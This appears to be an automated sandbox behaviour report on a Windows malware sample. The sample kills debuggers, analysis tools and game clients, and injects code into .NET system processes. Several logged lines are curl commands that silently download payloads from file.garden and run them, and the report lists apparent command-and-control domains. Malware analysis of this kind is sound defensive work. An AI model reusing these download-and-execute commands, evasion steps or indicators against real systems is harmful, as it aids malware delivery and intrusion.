                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\Windows\Speech\rtcore64.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 380000 value starts with: 4D5A
                                Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: strappystyio.shop
                                Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coursedonnyre.shop
                                Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fossillargeiw.shop
                                Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tendencerangej.shop
                                Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: appleboltelwk.shop
                                Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tearrybyiwo.shop
                                Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: captainynfanw.shop
                                Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: surveriysiop.shop
                                Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tiddymarktwo.shop
                                Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: delaylacedmn.site
                                Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: writekdmsnu.site
                                Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: agentyanlark.site
                                Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: bellykmrebk.site
                                Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: underlinemdsj.site
                                Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: commandejorsk.site
                                Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: possiwreeste.site
                                Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: famikyjdiag.site
                                Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: explorationmsn.stor
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D68008Jump to behavior
                                Source: C:\Windows\Speech\rtcore64.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 380000
                                Source: C:\Windows\Speech\rtcore64.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 381000
                                Source: C:\Windows\Speech\rtcore64.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3CB000
                                Source: C:\Windows\Speech\rtcore64.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3CE000
                                Source: C:\Windows\Speech\rtcore64.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3DE000
                                Source: C:\Windows\Speech\rtcore64.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 4DC008
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color 7Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\imxyvi.exe "C:\Windows\Speech\imxyvi.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\rtcore64.exe "C:\Windows\Speech\rtcore64.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
